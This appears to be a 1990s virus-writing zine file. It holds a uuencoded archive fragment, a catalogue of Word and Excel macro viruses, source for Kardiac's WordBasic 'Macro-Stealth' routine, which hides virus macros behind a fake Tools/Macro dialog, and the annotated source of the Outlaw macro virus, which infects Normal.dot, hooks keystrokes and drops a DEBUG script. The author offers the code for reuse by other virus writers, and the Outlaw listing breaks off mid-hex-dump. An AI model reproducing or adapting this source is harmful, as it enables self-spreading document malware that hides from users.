MF1$Y*<'E./&N:6=NA9XI4[VVE:LB,XS2FTM%K*<="2MQ7+ZXO=R::GB2$?*K
MX5^MLA8DM1I>EE#*4MR:-;D,EN%<OCI;8";UJ*0CT@V)+P=$'V/2'-1E2S!/
MD[P+E^/9)LBC+Q&/%Q(KSPG+0^Z?PWF+Q^!5CL&K&(-7-(SWJ,U!KGZ[R<]9
M_07B.;O?(9Y7]4\33_@]XEG2[S3OATMQ#"RMH$#.[<R8)3S0`G&D4UV<G:T*
MQ&Q5@A%J6^2]&J-B6C#49>B+@O>)9MPG?A_GO<Y0AYHZ"BP?S8;69)XVNLU6
M;)'*%>$214RWS<BF.N7DCU<VX>?;X%O/%'B6*,L%'3[_Z=__T-@17-,N^!6"
MOT3\[A6<?K'7D6&A37QNHP>%.U])WX'$RXZ)5`C"4E4'5;[5,:I"IKD)LBB(
MJY7]0,>5?"Z[R[P!JMMS'^](?:";8HA$EHOO><)CKQ(M5;6<+M3^_)N4#_F0
M#_F0#_F0#_F0#_F0#_F0#_F0#U^2<%%\W+:-XO/1PM#]/_[HTT"WZV??*Z0E
M-_WBK!N\!]4';TW=K^6#$(^Z*QQ4=X&WJ[O"?>I>\#YUQ_@]A[S[RZ="?"!-
M0>_P=^0T3]TK'G&-4Y1!OSU;G[D_/A'];6_\_HU#5=>Y'GT,^E=^>LRM[GU8
M]9^I])^N]'>I>[M76.KQOV/HSQ_[2&\UIJOR,L]Y+BG+]Z?EN9>`ZBOH#)>T
MV#R5(GL)*26.=#05Q<;,W"6R6__I9HS[/["`O5A>3!AY]W[N:#OJN6M/;`5?
M]-]02P$"%``4``(`"`!]0R$BLYJ2U&H````G`0``"P`````````!`"``````
M````1DE,15])1"Y$25I02P$"%``4``(`"``@(2$B!);3WX0"```?"```"@``
M```````!`"````"3````3$5'14Y$+E185%!+`0(4`!0``@`(`)`B(2*R8X['
MF@P````T```*````````````(````#\#``!,14=%3D0N6$Q34$L%!@`````#
C``,`J0````$0```6`%!94D\@4%)/1%5#5$E/3E,@,3DY-RX`
`
end
A list of all known macro virus
--------------------------------------------------------------
A list of all known macro virus
,
By <****{=============-
' AuRoDrEpH, the Drow
--------------------------------------------------------------
X : you can find this virus in my web page...
Status: November 30, 1996
Steal on Universtity of Hamburg, Germany (1996)
---------------------------------------------------------------
Host Software = MS Word:
------------------------
virus://WordMacro/Alien =Chandi
X virus://WordMacro/Alliance
X virus://WordMacro/Atom.A
virus://WordMacro/Atom.B
virus://WordMacro/Atom.C
virus://WordMacro/Atom.D
X virus://WordMacro/Atom.E
X virus://WordMacro/Atom.F
X virus://WordMacro/Bandung.A =Kacaw(=Concept.J)
virus://WordMacro/Bandung.B
virus://WordMacro/Bandung.C
virus://WordMacro/Bandung.D
virus://WordMacro/Bandung.E
virus://WordMacro/Bandung.F
virus://WordMacro/Birthday:De =PCW:De Birthday
virus://WordMacro/Boom:De Boom
X virus://WordMacro/Buero:De Bueroneu
virus://WordMacro/Clock:De =Extra
X virus://WordMacro/Colors.A =Colour.A Color
virus://WordMacro/Colors.B
virus://WordMacro/Colors.C
virus://WordMacro/Colors.D
virus://WordMacro/Colors.E
virus://WordMacro/Colors.F
virus://WordMacro/Colors.G
virus://WordMacro/Colors.H
X virus://WordMacro/Concept.A =Prank Word Macro 9508
virus://WordMacro/Concept.B:Fr Concept Francais
virus://WordMacro/Concept.C
virus://WordMacro/Concept.D HaHa
virus://WordMacro/Concept.E
virus://WordMacro/Concept.F =Parasite.A Parasite
virus://WordMacro/Concept.G (=Parasite.A)
X virus://WordMacro/Concept.H
virus://WordMacro/Concept.I
virus://WordMacro/Concept.J =(WM.)Parasite.B
virus://WordMacro/Concept.K:NL =Pheeew:NL
virus://WordMacro/Concept.L
virus://WordMacro/Concept.L1
trojan://WordMacro/Concept.L/dropper
virus://WordMacro/Concept.M
virus://WordMacro/Concept.M1
trojan://WordMacro/Concept.M/dropper
intended://WordMacro/Concept.N
virus://WordMacro/Concept.O:Tw
virus://WordMacro/Concept.P
virus://WordMacro/Concept.Q
virus://WordMacro/Concept.R
virus://WordMacro/Concept.S
virus://WordMacro/CountTen =Count10
X virus://WordMacro/Daniel.A
virus://WordMacro/Daniel.B
X virus://WordMacro/Date =AntiDMV=Infezione (Infezione)
X generator://WordMacro/Demolition Kit
virus://WordMacro/Dietzel:De
X virus://WordMacro/Divina.A Infezione
virus://WordMacro/Divina.B
virus://WordMacro/Divina.C
X virus://WordMacro/DMV.A
virus://WordMacro/DMV.B =Waverley
virus://WordMacro/Doggie
X virus://WordMacro/Easy
X trojan://WordMacro/FormatC FormatC
X virus://WordMacro/Friendly:De
X virus://WordMacro/Gangsterz Gangster
virus://WordMacro/Goldfish
X virus://WordMacro/Hassle =Assistent Bogus
X virus://WordMacro/Helper
X virus://WordMacro/Hot
X virus://WordMacro/Imposter.A Imposter
virus://WordMacro/Imposter.B
virus://WordMacro/Irish Irish
X virus://WordMacro/Italian.It
virus://WordMacro/Johnny
virus://WordMacro/KillDLL
virus://WordMacro/Look.A:Tw
virus://WordMacro/Look.B:Tw
virus://WordMacro/Look.C:Tw =Fist Fist
virus://WordMacro/Look.D:Tw
virus://WordMacro/Lunch.A
virus://WordMacro/Lunch.B
X virus://WordMacro/Maddog
X virus://WordMacro/Magnum
X virus://WordMacro/MDMA.A =Sticky Keys Sticky Keys
virus://WordMacro/MDMA.B
virus://WordMacro/MDMA.C
virus://WordMacro/MDMA.D
virus://WordMacro/MDMA.E
virus://WordMacro/Minimal
X generator://WordMacro/MVDK
virus://WordMacro/NiceDay
X virus://WordMacro/Niki.It
virus://WordMacro/NF
X generator://WordMacro/NJ-WMCVK
X virus://WordMacro/NOP.A:De NOP
virus://WordMacro/NOP.B:De
intended://WordMacro/NOP.C:De
virus://WordMacro/NPAD.A Jakarta
virus://WordMacro/NPAD.B
virus://WordMacro/NPAD.C
virus://WordMacro/NPAD.D
virus://WordMacro/NPAD.E
X virus://WordMacro/Nuclear.A Word Macro 9509
virus://WordMacro/Nuclear.B
virus://WordMacro/Nuclear.C
virus://WordMacro/Nuclear.D
virus://WordMacro/Olympic.A:Tw
virus://WordMacro/Olympic.B:Tw
X virus://WordMacro/Outlaw.A
virus://WordMacro/Outlaw.B
virus://WordMacro/Outlaw.C =GoodBye,=Moon
trojan://WordMacro/Outlaw.C.dropper =GoodBye.dropper
virus://WordMacro/Phantom =Guess Phantom
X virus://WordMacro/Phardera
X virus://WordMacro/Polite
X virus://WordMacro/RAPI.A
virus://WordMacro/RAPI.A1
virus://WordMacro/RAPI.A1
virus://WordMacro/RAPI.B
virus://WordMacro/RAPI.B1
virus://WordMacro/RAPI.B2
virus://WordMacro/RAPI.C
virus://WordMacro/RAPI.C1
virus://WordMacro/Reflex =Red Dwarf=Challenge
trojan://WordMacro/Reflex/dropper
X virus://WordMacro/Satanic
X virus://WordMacro/Saver:De
virus://WordMacro/ShowOff
virus://WordMacro/Smiley:De
X virus://WordMacro/Spooky:De
X virus://WordMacro/Stryx:De
virus://WordMacro/Target.A:De
virus://WordMacro/Target.B:De
virus://WordMacro/Tedious
X virus://WordMacro/Tele:De =WM.Telefonica=Tele-Sex Telefonica
=LBNJ:De
virus://WordMacro/Theatre.A:Tw
virus://WordMacro/Theatre.B:Tw
X virus://WordMacro/TWNO.A:Tw Taiwan No.1
intended://WordMacro/TWNO.B:Tw =Mario
virus://WordMacro/TWNO.C:Tw
virus://WordMacro/TWNO.D:Tw
X virus://WordMacro/Wazzu.A Wazzu
virus://WordMacro/Wazzu.B
virus://WordMacro/Wazzu.C
virus://WordMacro/Wazzu.D
virus://WordMacro/Wazzu.E
virus://WordMacro/Wazzu.F =Bosco Bosco
virus://WordMacro/Wazzu.G
virus://WordMacro/Wazzu.H =MicroSloth Sloth
virus://WordMacro/Wazzu.I
virus://WordMacro/Wazzu.J
virus://WordMacro/Wazzu.K
virus://WordMacro/Wazzu.L
virus://WordMacro/Wazzu.M
virus://WordMacro/Wazzu.N
virus://WordMacro/Wazzu.O
virus://WordMacro/Wazzu.P
virus://WordMacro/Wazzu.Q
virus://WordMacro/Wazzu.R
virus://WordMacro/Wazzu.S
virus://WordMacro/Wazzu.T
virus://WordMacro/Wazzu.U
virus://WordMacro/Wazzu.V
virus://WordMacro/Wazzu.W
virus://WordMacro/Wazzu.X =Grinder
X virus://WordMacro/Wazzu.Y
X virus://WordMacro/Wazzu.Z
virus://WordMacro/Weather.A:Tw =(Chinese) Fish (Fish)
virus://WordMacro/Weather.B:Tw
trojan://WordMacro/Wiederoeffnen
X virus://WordMacro/Xenixos:De =XOS=Nemesis Nemesis
Host Software = AmiPro:
-----------------------
X virus://AmiMacro/Green_Stripe
Host Software = MS Excel:
-------------------------
X virus://ExcelMacro/Laroux.A
virus://ExcelMacro/Laroux.B
X intended://ExcelMacro/DMV
joke://ExcelMacro/Format
Host Software = Lotus 123:
--------------------------
X trojan://Lotus123Macro/Ramble/dropper
==========================================================================
A new macro virus (written by Kardiac)
--------------------------------------------------------------
A new macro virus (written by Kardiac)
,
By <****{=============-
' AuRoDrEpH, the Drow
--------------------------------------------------------------
An interesting source commented by his author... thanks to him..
==========================================================================
'**************
'* ToolsMacro *
'********************************************************************
'* Macro-Stealth. *
'* *
'* This macro will Stealth its existance from the user, via the *
'* Tools/Macro menu. Any macros deleted by the user will become *
'* Stealthed. *
'* *
'* Kardiac. *
'* *
'********************************************************************
Dim Shared listDisp$(2) ' Display Options. Normal.Dot, Global
Dim Shared MacList$(128) ' Displayed list of Macro names.
Dim Shared MacDesc$(1) ' Macro Description.
Dim Shared StealthMacList$(128)' List of macros to be Stealthed.
Dim Shared StealthMacNum ' Number of Macros to be Stealthed.
Dim Shared StealthFlag ' Stealth Flag
Dim Shared CurrentStealthMacCount
' Variable for counting Stealthed Macros
' in the current Context.
Dim Shared Context ' Current Macros Context Normal or
' Active.
Sub BuildMacList(MacList$(), Context)
On Error Goto ErrorHandler
' Find how many Macros we need to stealth in the current Macro List
' using the current Macro Context.
CurrentStealthMacCount = 0 ' Count how many we need to hide.
For count = 1 To (CountMacros(Context))
StealthFlag = 0 ' Assume we have nothing to hide.
For x = 0 To StealthMacNum ' Check our list of Macros..
If InStr(StealthMacList$(x), MacroName$(count, Context)) <> 0 \
Then
StealthFlag = 1 ' We have to hide MacroName$(count..
CurrentStealthMacCount = CurrentStealthMacCount + 1
End If
Next x
Next count
' ReDimension the MacList to the number of Macros in the Current
' Macro Context.
' MacroList$ = (RealMacList$ - StealthMacList$)
If ((CountMacros(Context) - CurrentStealthMacCount) - 1) > - 1 Then
Redim MacList$((CountMacros(Context) - CurrentStealthMacCount) - 1)
Else
Redim MacList$(0)
MacList$(0) = ""
End If
StealthMacCount = 0 ' Count how many Stealthed Macros we have found in the Current Macro Context..
For count = 1 To (CountMacros(Context))
StealthFlag = 0 ' is MacroName$(count.. a member of StealthList
For x = 0 To StealthMacNum
If InStr(StealthMacList$(x), \
MacroName$(count, Context)) <> 0 Then
StealthFlag = 1
End If
Next x
' If StealthFlag = 0 then Add MacroName$(count) to the MacList$
If (StealthFlag = 0) Then
MacList$(count - StealthMacCount - 1) = MacroName$(count, Context)
Else
StealthMacCount = StealthMacCount + 1
End If
Next count
Goto xEnd
ErrorHandler:
' Say nothing..
xEnd:
End Sub
'**********
'** MAIN **
'**********
Sub MAIN
DisableInput 1
DisableAutoMacros 0
Context = 0
' List of Macros to Stealth..
StealthMacList$(0) = "XToolsMacro"
StealthMacList$(1) = "CCC"
StealthMacList$(2) = "BBB"
StealthMacList$(3) = "AutoNew"
StealthMacList$(4) = "AutoOpen"
StealthMacNum = 5
BuildMacList(MacList$, Context)
listDisp$(0) = "All Active Templates"
listDisp$(1) = "Normal.dot (Global Template)"
listDisp$(2) = "Word Commands"
Begin Dialog UserDialog 424, 308, "Macro", .StealthToolMacro
ComboBox 7, 28, 250, 160, MacList$(), .MacList
Text 6, 12, 101, 13, "&Macro Name:"
Text 6, 193, 152, 29, "Macros &Available in:"
Text 3, 234, 92, 13, "Description:", .Descr
TextBox 5, 248, 388, 39, .MacDesc, 1
ListBox 392, 248, 24, 36, MacList$(), .DummyListBox
DropListBox 5, 209, 411, 83, listDisp$(), .DispList
PushButton 274, 19, 140, 21, "&Record", .Record
PushButton 274, 45, 140, 21, "Cancel", .Cancel
PushButton 274, 75, 140, 21, "Run", .Run
PushButton 274, 99, 140, 21, "Create", .Create
PushButton 274, 124, 140, 21, "Delete", .Delete
PushButton 274, 154, 140, 21, "Organizer...", .Organizer
End Dialog
Dim dlg As UserDialog
Dialog(dlg, 2)
bye:
DisableInput 0
DisableAutoMacros 1
End Sub
Function StealthToolMacro(ControlID$, action, SuppValue)
Select Case Action
Case 1
' Inialise
DlgEnable "Delete", 0
DlgEnable "MacDesc", 0
DlgValue "DispList", 1 ' Default option Normal.Dot
Case 2
'MsgBox ControlID$
Select Case ControlID$
Case "MacList"
DlgEnable "Delete", 1
DlgEnable "MacDesc", 1' Update the Description text..
DlgText "MacDesc", MacroDesc$(MacList$(SuppValue))
DlgText "Create", "Edit"
StealthToolMacro = 1
Case "DispList"
selectedItem = DlgValue("MacList")
Select Case SuppValue
Case 0
Context = 1 ' Active template
Case 1
Context = 0 ' Normal template
Case Else
' They have requested the Interal Word
' Command List
End Select
BuildMacList(MacList$, Context)
DlgListBoxArray "MacList", MacList$()
DlgFocus "MacList"
DlgText MacList, ""
DlgValue "MacList", selectedItem
StealthToolMacro = 1
Case "Create"
MsgBox "Dialog Error: Unable to allocate GDI memory.", \
"Word Basic Error = 182", 16
DlgFocus "Cancel"
DlgEnable "Create", 0
StealthToolMacro = 1
Case "Delete"
If DlgValue("MacList") >= 0 Then
StealthMacList$(StealthMacNum + 1) = \
MacList$(DlgValue("MacList"))
StealthMacNum = StealthMacNum + 1
BuildMacList(MacList$, Context)
DlgListBoxArray "MacList", MacList$()
DlgFocus "MacList"
DlgText MacList, ""
End If
StealthToolMacro = 1
Case Else
' Do nothing..
End Select
Case Else
End Select
End Function
==========================================================================
Analysis of a kind of macro virus
--------------------------------------------------------------
Analysis of a kind of macro virus
OUTLAW (created by Nightmare Joke)
,
By <****{=============-
' AuRoDrEpH, the Drow
--------------------------------------------------------------
This virus was very special :
- no macro (AUTOEXEC, AUTOOPEN or AUTOCLOSE) but it still can infect new files. interesting thing, no ??
- the name of the 3 macros isn't the same on each infection.
I think that this type of virus isn't easy to detect, so you can use some good idea
- Name of the virus = OUTLAW
- Author= Nightmare Joker
- Origin = Dutch
- Number of macro= 3
- Encrypted= No
- Payload= play a sound file (.WAV) and print a message on the screen the 20/01.
The payload is executed only with WinWord ver 7.0 (Win95)
Now the source :
----------------------------------------------------------
Macro M8064
PURPOSE : To infected the system
Sub MAIN
On Error Goto Done
A$ = NomFichier$()
If A$ = "" Then Goto Finish
If CheckInstalled = 0 Then
Routine
Crypt
PayloadMakro
FichierEnregistrerTout 1, 1
Else
Goto Done
End If
Done:
A$ = NomFichier$()
If A$ = "" Then
Goto Finish
Else
Insertion " "
End If
Finish:
End Sub
Sub Crypt
-> sub-program to create the name of the macro number 2 and copy to the NORMAL.DOT
One = 7369
Two = 9291
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
Beginn = Heure(Maintenant())
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "A"
If B$ = "2" Then C$ = "B"
If B$ = "3" Then C$ = "C"
If B$ = "4" Then C$ = "D"
If B$ = "5" Then C$ = "E"
If B$ = "6" Then C$ = "F"
If B$ = "7" Then C$ = "G"
If B$ = "8" Then C$ = "H"
If B$ = "9" Then C$ = "I"
If B$ = "10" Then C$ = "J"
If B$ = "11" Then C$ = "K"
If B$ = "12" Then C$ = "L"
If B$ = "13" Then C$ = "M"
If B$ = "14" Then C$ = "N"
If B$ = "15" Then C$ = "O"
If B$ = "16" Then C$ = "P"
If B$ = "17" Then C$ = "Q"
If B$ = "18" Then C$ = "R"
If B$ = "19" Then C$ = "S"
If B$ = "20" Then C$ = "T"
If B$ = "21" Then C$ = "U"
If B$ = "22" Then C$ = "V"
If B$ = "23" Then C$ = "W"
If B$ = "00" Then C$ = "X"
E$ = C$ + A$
ZU$ = LitVarDoc$("VirNameDoc")
PG$ = NomFenÍtre$() + ":" + ZU$
MacroCopie PG$, "Global:" + E$
SetProfileString "Intl", "Name2", E$
-> link this macro with the keyboard E... so when the user hit the "E" is launch this macro
OutilsPersonnaliserClavier .CodeTouche = 69, .CatÈgorie = 2, .Nom = E$, .Ajouter, .Contexte = 0
End Sub
Sub Routine
-> sub-program to create the name of the macro number 1 and copy to the NORMAL.DOT
One = 7369
Two = 9291
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
Beginn = Heure(Maintenant())
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "A"
If B$ = "2" Then C$ = "B"
If B$ = "3" Then C$ = "C"
If B$ = "4" Then C$ = "D"
If B$ = "5" Then C$ = "E"
If B$ = "6" Then C$ = "F"
If B$ = "7" Then C$ = "G"
If B$ = "8" Then C$ = "H"
If B$ = "9" Then C$ = "I"
If B$ = "10" Then C$ = "J"
If B$ = "11" Then C$ = "K"
If B$ = "12" Then C$ = "L"
If B$ = "13" Then C$ = "M"
If B$ = "14" Then C$ = "N"
If B$ = "15" Then C$ = "O"
If B$ = "16" Then C$ = "P"
If B$ = "17" Then C$ = "Q"
If B$ = "18" Then C$ = "R"
If B$ = "19" Then C$ = "S"
If B$ = "20" Then C$ = "T"
If B$ = "21" Then C$ = "U"
If B$ = "22" Then C$ = "V"
If B$ = "23" Then C$ = "W"
If B$ = "00" Then C$ = "X"
D$ = C$ + A$
UZ$ = LitVarDoc$("VirName")
GP$ = NomFenÍtre$() + ":" + UZ$
MacroCopie GP$, "Global:" + D$
SetProfileString "Intl", "Name", D$
-> link this macro with the keyboard Space... so when the user hit "Space" is launch this macro
OutilsPersonnaliserClavier .CodeTouche = 32, .CatÈgorie = 2, .Nom = D$, .Ajouter, .Contexte = 0
End Sub
Sub PayloadMakro
-> sub-program to create the name of the macro number 3 (payload) and copy to the NORMAL.DOT
One = 7369
Two = 9291
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
Beginn = Heure(Maintenant())
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "A"
If B$ = "2" Then C$ = "B"
If B$ = "3" Then C$ = "C"
If B$ = "4" Then C$ = "D"
If B$ = "5" Then C$ = "E"
If B$ = "6" Then C$ = "F"
If B$ = "7" Then C$ = "G"
If B$ = "8" Then C$ = "H"
If B$ = "9" Then C$ = "I"
If B$ = "10" Then C$ = "J"
If B$ = "11" Then C$ = "K"
If B$ = "12" Then C$ = "L"
If B$ = "13" Then C$ = "M"
If B$ = "14" Then C$ = "N"
If B$ = "15" Then C$ = "O"
If B$ = "16" Then C$ = "P"
If B$ = "17" Then C$ = "Q"
If B$ = "18" Then C$ = "R"
If B$ = "19" Then C$ = "S"
If B$ = "20" Then C$ = "T"
If B$ = "21" Then C$ = "U"
If B$ = "22" Then C$ = "V"
If B$ = "23" Then C$ = "W"
If B$ = "00" Then C$ = "X"
K$ = C$ + A$
ZUZ$ = LitVarDoc$("VirNamePayload")
GP$ = NomFenÍtre$() + ":" + ZUZ$
MacroCopie GP$, "Global:" + K$
SetProfileString "Intl", "Name3", K$
End Sub
Function CheckInstalled
-> test if the virus is still install on the NORMAL.DOT
CC$ = GetProfileString$("Intl", "Name")
CheckInstalled = 0
If CompteMacros(0) > 0 Then
For i = 1 To CompteMacros(0)
If NomMacro$(i, 0) = CC$ Then
CheckInstalled = 1
End If
Next i
End If
End Function
----------------------------
Macro M8151
PURPOSE :It is the virus payload (no danger...)
Declare Function GetWindowsDirectoryA Lib "Kernel32"(WinDir$, nSize As Long) As Long
Declare Function sndPlaySound Lib "winmm.dll"(pszSoundName As String, uFlags As Long) As Long Alias "sndPlaySoundA"
Sub MAIN
Install
Insert
NO$ = GetProfileString$("Intl", "Name")
NJ$ = NomFichierMacro$(NO$)
G$ = InfosNomFichier$(NJ$, 5)
WinDir$ = String$(255, "X")
N = GetWindowsDirectoryA(WindDir$, 255)
N = sndPlaySound(G$ + "laugh.wav ", 0)
End Sub
Sub Insert
-> To print on the screen a page
PleinEcran
FenDocAgrandissement
InsertionPara
Insertion Chr$(9) + Chr$(9) + Chr$(9) + Chr$(9) + Chr$(9)
Gras
TaillePolice 18
Insertion "You are infected with"
InsertionPara
InsertionPara
InsertionPara
TaillePolice 72
Insertion Chr$(9) + Chr$(9) + Chr$(9) + Chr$(9) + "Outlaw"
InsertionPara
InsertionPara
TaillePolice 18
Insertion Chr$(9) + Chr$(9) + Chr$(9) + Chr$(9) + "A virus from Nightmare Joker"
End Sub
Sub Install
-> To prepare the sound (with the debug)
FichierNouveau .ModËle = "Normal.dot", .NouvModËle = 1
NO$ = GetProfileString$("Intl", "Name")
NJ$ = NomFichierMacro$(NO$)
G$ = InfosNomFichier$(NJ$, 5)
Open G$ + "laugh.scr" For Output As #1
Print #1, "N LAUGH.COM"
Print #1, "E 0100 52 49 46 46 32 0E 00 00 57 41 56 45 66 6D 74 20"
Print #1, "E 0110 32 00 00 00 22 00 01 00 40 1F 00 00 2B 04 00 00"
Print #1, "E 0120 20 00 01 00 20 00 01 00 F0 00 00 00 00 00 00 00"
Print #1, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0140 00 00 00 00 00 00 66 61 63 74 04 00 00 00 08 68"
Print #1, "E 0150 00 00 64 61 74 61 E0 0D 00 00 9B 59 2B 31 7F 2C"
Print #1, "E 0160 F4 2F 88 48 2E BF 42 88 88 71 C0 B0 DE 7E F9 67"
Print #1, "E 0170 82 49 58 A9 06 00 69 87 5C 19 41 E2 D2 75 FF FF"
Print #1, "E 0180 FF 0F 55 15 55 25 00 00 00 00 10 8B 08 0A B0 4B"
Print #1, "E 0190 B1 88 A0 37 B0 05 A0 37 00 44 99 D1 D1 4C FF CF"
Print #1, "E 01A0 0D 2C 00 80 BF B4 A8 06 92 7A 20 E1 23 58 29 D5"
Print #1, "E 01B0 A3 BD 1B A4 09 A9 3B C8 1D 50 95 5C D1 55 7F 62"
Print #1, "E 01C0 32 46 12 EA CE 57 2A 44 AA 19 0C 97 26 6F 8A D0"
Print #1, "E 01D0 98 A6 8D BB E9 79 DB 70 89 D1 9D 3C DB BC 1E 4F"
Print #1, "E 01E0 B0 45 DC 2A 28 C9 FB BE 0A 5D 9C 11 39 8D 3F AF"
Print #1, "E 01F0 F2 E6 7B 49 63 07 DD 24 B0 BA DF D3 E2 B8 A7 F0"
Print #1, "E 0200 EF 44 A7 BA 22 C5 77 2A 57 57 0C 9F E6 30 DD 9A"
Print #1, "E 0210 CC 82 3E F4 CC 81 DC 88 C2 B3 1F 44 DB 94 A9 2E"
Print #1, "E 0220 E6 46 22 5D EF 1F 17 1D 9B 52 BE D9 91 F9 DC AF"
Print #1, "E 0230 B9 83 AC 0D 2C 86 6F E9 04 93 D9 5C 4A 9A AD 40"
Print #1, "E 0240 32 59 20 D2 5E 0D 8C 66 C8 55 1D 91 43 3A 6D FF"
Print #1, "E 0250 E0 EB CC D5 D8 34 4C ED 0D 57 1F 64 59 D5 47 D1"
Print #1, "E 0260 FF 57 63 2A 0A 99 6E 6A 77 65 1E 58 AD 3A 6F 8C"
Print #1, "E 0270 62 25 EE 43 C8 47 5D 7E 71 66 9F 6B C2 99 C5 1A"
Print #1, "E 0280 30 4C F5 1A C0 DD 08 BD 36 40 7D 63 9E 63 9E 31"
Print #1, "E 0290 30 81 8D C1 70 AD BD A8 F0 9F 1B 64 CA B9 CC 12"
Print #1, "E 02A0 1B 48 88 7A 9F 92 3B 9F 28 45 BF B1 81 CB AE 8E"
Print #1, "E 02B0 DD A7 2C 75 65 27 5D 76 19 E3 DF EB C9 B9 23 D8"
Print #1, "E 02C0 89 41 FE E9 C1 96 20 67 35 40 9D 11 76 08 AD A3"
Print #1, "E 02D0 4C EE 1E E7 90 72 4E 96 46 8A DB EB E2 B9 5E 51"
Print #1, "E 02E0 92 48 C8 3D E2 52 75 A2 85 44 2D BB DB D1 CF D9"
Print #1, "E 02F0 29 FD BE A4 2E 81 EE 28 66 1B DD EB C2 BD 69 59"
Print #1, "E 0300 6C 45 C2 C6 F7 2B 86 3F 00 4F 9F 9D 08 8B FE 05"
Print #1, "E 0310 76 DC AD E3 5B 1B BE 93 78 40 61 6C 32 B9 AE 7F"
Print #1, "E 0320 CD 4C 27 48 6B B2 D1 F5 4D 6F 2F DA 51 4B 0F 42"
Print #1, "E 0330 B9 BA 5E B4 72 02 6E 73 70 4D DD E3 CA BD 47 A5"
Print #1, "E 0340 13 56 E9 BF C6 10 55 97 CA 55 DF E7 79 7B AF 8A"
Print #1, "E 0350 C4 64 3F 99 24 A2 8F 9F 6D 3C DB 5B D3 79 30 D2"
Print #1, "E 0360 7B 3C 7D 7D 75 BD 5D 2A E0 7E 4F 18 A9 E9 4F F7"
Print #1, "E 0370 BC FD 4F 03 86 1D 5F E4 6C 66 E3 52 A9 75 D9 BB"
Print #1, "E 0380 52 7B FA DF DF B7 A9 0D C9 78 2F 5B A2 F7 3F 8E"
Print #1, "E 0390 82 A0 BF 8B 36 47 6F B2 ED B1 67 E2 39 91 B5 13"
Print #1, "E 03A0 AA 4B F5 D5 2F A4 44 8D E7 5F 7E 62 BE 1E DF 89"
Print #1, "E 03B0 C6 44 4F 23 A9 25 5F B6 11 68 A1 DA B9 78 2B 22"
Print #1, "E 03C0 2A 66 E9 7D 5D 35 86 9F 61 75 AF 68 75 26 9E D9"
Print #1, "E 03D0 DB C0 6F E4 E2 D7 AE 47 F9 20 9F 62 4A 55 8F E0"
Print #1, "E 03E0 5F 0B 9B 7D 57 47 DF CE 57 35 7E ED E1 96 4D 71"
Print #1, "E 03F0 43 56 CD 6F 68 A2 7C 24 80 78 61 E4 32 B5 12 54"
Print #1, "E 0400 0B 63 33 7D 6C C7 C7 06 C0 5F BC 29 6E BE AD 6A"
Print #1, "E 0410 C0 17 DD 5F EC B3 5D F7 F2 41 21 64 BA AD 76 3E"
Print #1, "E 0420 51 70 F9 05 CA 1F 77 C1 19 39 BD 87 D2 89 2E 50"
Print #1, "E 0430 1D B4 0C A2 0C 75 0D 49 89 E7 DD E3 C9 99 CE 4E"
Print #1, "E 0440 0F 76 82 2E ED 13 4B B5 50 6F 5E 92 36 01 4D F1"
Print #1, "E 0450 02 B6 9C 29 10 63 AD AF 03 35 9B EB 4A 7A 4E 87"
Print #1, "E 0460 16 39 24 C8 FD 77 08 87 2E 65 BE BD F3 29 9C D9"
Print #1, "E 0470 94 58 3D D2 B5 5A 0D 62 BD DE DB 73 5A 7A 2B 22"
Print #1, "E 0480 3F 08 53 FD 57 A3 29 AA 7E 4F 0C 7A 08 A8 5D 87"
Print #1, "E 0490 78 17 BD 2D 1A 85 FC FE A3 03 5D E3 49 95 FB 6C"
Print #1, "E 04A0 2C 79 96 6E AE 52 2E 10 01 3A 1D 86 F3 A7 8D 43"
Print #1, "E 04B0 88 AB FD 7B 45 18 2D E2 1D C8 DF 5B C2 75 C5 12"
Print #1, "E 04C0 6C 45 1A 5B E3 5B B5 68 05 4F DC 69 8A 40 9D 87"
Print #1, "E 04D0 CB F8 DD 8B 3E 0A AC AE 5D 12 DF 6B 49 B5 44 4C"
Print #1, "E 04E0 53 4E 3D 02 A6 B8 72 AF F5 7E 4D A1 C1 2B 5E 1A"
Print #1, "E 04F0 86 F4 9D D7 AB D8 EC E3 A5 59 9D 43 42 6D C4 FF"
Print #1, "E 0500 DF 05 69 8D A7 CD AF 49 55 05 3C 3C 23 9C 9C 87"
Print #1, "E 0510 B8 17 3E 20 FA 5E BF 4C 7E EA 23 D3 D9 54 AE D6"
Print #1, "E 0520 A8 15 5F DF 7F 4D D7 55 FF 1F CF 61 41 02 8F E7"
Print #1, "E 0530 35 0E 1F 6C 1B 99 7F E6 A5 05 21 DB 53 B5 43 E4"
Print #1, "E 0540 A9 18 D7 F7 D7 5D DD DF 5D 1D DF 34 76 27 8F BC"
Print #1, "E 0550 00 01 8F CF 02 E6 0F 26 23 23 A1 E2 52 95 A9 16"
Print #1, "E 0560 03 18 D5 5D FD 77 FF DF 5D 15 EF 34 A2 03 0F E8"
Print #1, "E 0570 75 D6 8F 0F 4A B9 DF 81 99 35 E3 5A 4A 75 8B D6"
Print #1, "E 0580 30 1C F7 DF D7 9D 75 DF 7D 15 BF F2 B5 83 BF 68"
Print #1, "E 0590 F2 29 3F FF 30 01 6F 66 EA DA 9D CA 39 51 AA 58"
Print #1, "E 05A0 F2 15 5D D5 5D FD FF 55 7F 15 9F 76 2D 12 EF 3A"
Print #1, "E 05B0 68 7D DF 0A 0B B4 8F EB F8 AF 17 52 C1 6C 91 77"
Print #1, "E 05C0 52 29 55 5D DF 4F F5 5D DD 2F 3F 2B 8E 88 8F 35"
Print #1, "E 05D0 D4 3F FF E1 F3 27 EF A2 06 2A DF 5A C9 50 B5 D8"
Print #1, "E 05E0 63 35 F3 DD 4C 87 F7 D1 59 37 DF 64 79 A4 CF 95"
Print #1, "E 05F0 F0 57 2E 3C B6 DC 8E 0D 1E 2D 61 53 C2 34 31 C1"
Print #1, "E 0600 4A 19 4E FA 42 6B D7 7A 62 2F 8F 9A 92 E6 5F BE"
Print #1, "E 0610 71 05 4E FF 38 C4 4E DD D9 1D 21 63 5A 51 12 E5"
Print #1, "E 0620 3C 29 5B 17 CB EF 5D DF DF 2C 4E 42 7A 71 BE FC"
